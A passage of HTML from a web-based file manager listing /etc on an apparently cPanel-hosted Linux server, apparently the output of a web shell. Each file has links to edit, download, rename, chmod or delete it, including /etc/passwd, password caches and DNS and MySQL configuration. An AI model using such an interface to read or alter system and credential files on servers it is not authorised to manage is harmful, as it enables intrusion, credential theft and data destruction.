                                <button onclick="ajaxDelete('/etc/monitrc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="monitrc.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonitrc.rpmnew" class="file-link">📄 monitrc.rpmnew</a></td>
                            <td class="size">13.3 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-07-06 10:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmonitrc.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmonitrc.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/monitrc.rpmnew','monitrc.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/monitrc.rpmnew','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/monitrc.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="motd">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmotd" class="file-link">📄 motd</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-07 01:25</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmotd" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmotd" class="action-button">Download</a>
                                <button onclick="showRename('/etc/motd','motd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/motd','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/motd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="mtab">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmtab" class="file-link">📄 mtab</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0444</span></td>
                            <td>2026-08-20 10:51</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmtab" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmtab" class="action-button">Download</a>
                                <button onclick="showRename('/etc/mtab','mtab')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/mtab','0444')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/mtab',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="multipath.conf.oca">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmultipath.conf.oca" class="file-link">📄 multipath.conf.oca</a></td>
                            <td class="size">387 B</td>
                            <td><span class="permissions">0755</span></td>
                            <td>2024-08-12 23:00</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmultipath.conf.oca" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmultipath.conf.oca" class="action-button">Download</a>
                                <button onclick="showRename('/etc/multipath.conf.oca','multipath.conf.oca')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/multipath.conf.oca','0755')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/multipath.conf.oca',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="my.cnf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmy.cnf" class="file-link">📄 my.cnf</a></td>
                            <td class="size">1.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:12</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmy.cnf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmy.cnf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/my.cnf','my.cnf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/my.cnf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/my.cnf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="my.cnf.rpmsave">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmy.cnf.rpmsave" class="file-link">📄 my.cnf.rpmsave</a></td>
                            <td class="size">1.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:08</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fmy.cnf.rpmsave" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fmy.cnf.rpmsave" class="action-button">Download</a>
                                <button onclick="showRename('/etc/my.cnf.rpmsave','my.cnf.rpmsave')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/my.cnf.rpmsave','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/my.cnf.rpmsave',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf" class="file-link">📄 named.conf</a></td>
                            <td class="size">313.6 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-19 20:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf','named.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.cache" class="file-link">📄 named.conf.cache</a></td>
                            <td class="size">50.4 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 08:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf.cache','named.conf.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf.precpanelinstall">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.precpanelinstall" class="file-link">📄 named.conf.precpanelinstall</a></td>
                            <td class="size">1.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.precpanelinstall" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf.precpanelinstall" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf.precpanelinstall','named.conf.precpanelinstall')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf.precpanelinstall','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf.precpanelinstall',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf.prerebuilddnsconfig">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.prerebuilddnsconfig" class="file-link">📄 named.conf.prerebuilddnsconfig</a></td>
                            <td class="size">3.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.prerebuilddnsconfig" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf.prerebuilddnsconfig" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf.prerebuilddnsconfig','named.conf.prerebuilddnsconfig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf.prerebuilddnsconfig','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf.prerebuilddnsconfig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf.rebuilddnsconfig">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.rebuilddnsconfig" class="file-link">📄 named.conf.rebuilddnsconfig</a></td>
                            <td class="size">3.4 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.rebuilddnsconfig" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf.rebuilddnsconfig" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf.rebuilddnsconfig','named.conf.rebuilddnsconfig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf.rebuilddnsconfig','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf.rebuilddnsconfig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.conf.zonedir.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.zonedir.cache" class="file-link">📄 named.conf.zonedir.cache</a></td>
                            <td class="size">57 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 08:52</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.conf.zonedir.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.conf.zonedir.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.conf.zonedir.cache','named.conf.zonedir.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.conf.zonedir.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.conf.zonedir.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.rfc1912.zones">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.rfc1912.zones" class="file-link">📄 named.rfc1912.zones</a></td>
                            <td class="size">1.0 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-13 11:27</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.rfc1912.zones" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.rfc1912.zones" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.rfc1912.zones','named.rfc1912.zones')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.rfc1912.zones','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.rfc1912.zones',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="named.root.key">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.root.key" class="file-link">📄 named.root.key</a></td>
                            <td class="size">686 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-13 11:36</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnamed.root.key" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnamed.root.key" class="action-button">Download</a>
                                <button onclick="showRename('/etc/named.root.key','named.root.key')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/named.root.key','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/named.root.key',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nanorc">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnanorc" class="file-link">📄 nanorc</a></td>
                            <td class="size">10.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-03-13 03:12</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnanorc" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnanorc" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nanorc','nanorc')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nanorc','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nanorc',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="neighbor_netblocks">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fneighbor_netblocks" class="file-link">📄 neighbor_netblocks</a></td>
                            <td class="size">13 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fneighbor_netblocks" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fneighbor_netblocks" class="action-button">Download</a>
                                <button onclick="showRename('/etc/neighbor_netblocks','neighbor_netblocks')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/neighbor_netblocks','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/neighbor_netblocks',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="netconfig">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnetconfig" class="file-link">📄 netconfig</a></td>
                            <td class="size">767 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-10-01 17:46</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnetconfig" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnetconfig" class="action-button">Download</a>
                                <button onclick="showRename('/etc/netconfig','netconfig')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/netconfig','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/netconfig',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="networks">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnetworks" class="file-link">📄 networks</a></td>
                            <td class="size">58 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2020-06-23 06:11</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnetworks" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnetworks" class="action-button">Download</a>
                                <button onclick="showRename('/etc/networks','networks')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/networks','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/networks',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nfs.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnfs.conf" class="file-link">📄 nfs.conf</a></td>
                            <td class="size">1.6 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 16:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnfs.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnfs.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nfs.conf','nfs.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nfs.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nfs.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nfsmount.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnfsmount.conf" class="file-link">📄 nfsmount.conf</a></td>
                            <td class="size">3.5 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-04-08 16:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnfsmount.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnfsmount.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nfsmount.conf','nfsmount.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nfsmount.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nfsmount.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nocgiusers">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnocgiusers" class="file-link">📄 nocgiusers</a></td>
                            <td class="size">7.5 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 03:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnocgiusers" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnocgiusers" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nocgiusers','nocgiusers')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nocgiusers','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nocgiusers',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nscd.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnscd.conf" class="file-link">📄 nscd.conf</a></td>
                            <td class="size">1.7 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-03-24 20:20</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnscd.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnscd.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nscd.conf','nscd.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nscd.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nscd.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nsswitch.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnsswitch.conf" class="file-link">📄 nsswitch.conf</a></td>
                            <td class="size">2.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-18 19:21</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnsswitch.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnsswitch.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nsswitch.conf','nsswitch.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nsswitch.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nsswitch.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="nsswitch.conf.bak">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnsswitch.conf.bak" class="file-link">📄 nsswitch.conf.bak</a></td>
                            <td class="size">2.1 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2024-11-12 12:30</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fnsswitch.conf.bak" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fnsswitch.conf.bak" class="action-button">Download</a>
                                <button onclick="showRename('/etc/nsswitch.conf.bak','nsswitch.conf.bak')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/nsswitch.conf.bak','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/nsswitch.conf.bak',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="ntp.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fntp.conf" class="file-link">📄 ntp.conf</a></td>
                            <td class="size">433 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fntp.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fntp.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/ntp.conf','ntp.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/ntp.conf','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/ntp.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="odbc.ini">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbc.ini" class="file-link">📄 odbc.ini</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-03-31 12:14</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbc.ini" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fodbc.ini" class="action-button">Download</a>
                                <button onclick="showRename('/etc/odbc.ini','odbc.ini')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/odbc.ini','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/odbc.ini',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="odbcinst.ini">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbcinst.ini" class="file-link">📄 odbcinst.ini</a></td>
                            <td class="size">469 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:10</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbcinst.ini" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fodbcinst.ini" class="action-button">Download</a>
                                <button onclick="showRename('/etc/odbcinst.ini','odbcinst.ini')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/odbcinst.ini','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/odbcinst.ini',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="odbcinst.ini.rpmnew">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbcinst.ini.rpmnew" class="file-link">📄 odbcinst.ini.rpmnew</a></td>
                            <td class="size">1.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-02-11 06:55</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fodbcinst.ini.rpmnew" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fodbcinst.ini.rpmnew" class="action-button">Download</a>
                                <button onclick="showRename('/etc/odbcinst.ini.rpmnew','odbcinst.ini.rpmnew')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/odbcinst.ini.rpmnew','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/odbcinst.ini.rpmnew',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="os-release">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fos-release" class="file-link">📄 os-release</a></td>
                            <td class="size">572 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-05-19 07:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fos-release" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fos-release" class="action-button">Download</a>
                                <button onclick="showRename('/etc/os-release','os-release')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/os-release','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/os-release',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="outgoing_mail_hold_users">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Foutgoing_mail_hold_users" class="file-link">📄 outgoing_mail_hold_users</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2025-09-01 07:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Foutgoing_mail_hold_users" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Foutgoing_mail_hold_users" class="action-button">Download</a>
                                <button onclick="showRename('/etc/outgoing_mail_hold_users','outgoing_mail_hold_users')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/outgoing_mail_hold_users','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/outgoing_mail_hold_users',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="outgoing_mail_suspended_users">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Foutgoing_mail_suspended_users" class="file-link">📄 outgoing_mail_suspended_users</a></td>
                            <td class="size">2.0 KB</td>
                            <td><span class="permissions">0640</span></td>
                            <td>2026-08-20 10:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Foutgoing_mail_suspended_users" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Foutgoing_mail_suspended_users" class="action-button">Download</a>
                                <button onclick="showRename('/etc/outgoing_mail_suspended_users','outgoing_mail_suspended_users')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/outgoing_mail_suspended_users','0640')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/outgoing_mail_suspended_users',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="p0fdisable">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fp0fdisable" class="file-link">📄 p0fdisable</a></td>
                            <td class="size">0 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2025-09-01 15:09</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fp0fdisable" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fp0fdisable" class="action-button">Download</a>
                                <button onclick="showRename('/etc/p0fdisable','p0fdisable')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/p0fdisable','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/p0fdisable',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="papersize">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpapersize" class="file-link">📄 papersize</a></td>
                            <td class="size">68 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-02-10 01:15</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpapersize" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpapersize" class="action-button">Download</a>
                                <button onclick="showRename('/etc/papersize','papersize')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/papersize','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/papersize',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="passwd">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd" class="file-link">📄 passwd</a></td>
                            <td class="size">60.9 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpasswd" class="action-button">Download</a>
                                <button onclick="showRename('/etc/passwd','passwd')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/passwd','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/passwd',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="passwd-">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd-" class="file-link">📄 passwd-</a></td>
                            <td class="size">61.3 KB</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-04 17:07</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd-" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpasswd-" class="action-button">Download</a>
                                <button onclick="showRename('/etc/passwd-','passwd-')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/passwd-','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/passwd-',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="passwd.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd.cache" class="file-link">📄 passwd.cache</a></td>
                            <td class="size">339.5 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 10:34</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fpasswd.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/passwd.cache','passwd.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/passwd.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/passwd.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="passwd.nouids.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd.nouids.cache" class="file-link">📄 passwd.nouids.cache</a></td>
                            <td class="size">171.7 KB</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-19 03:35</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fpasswd.nouids.cache" class="action-button">Edit</a>
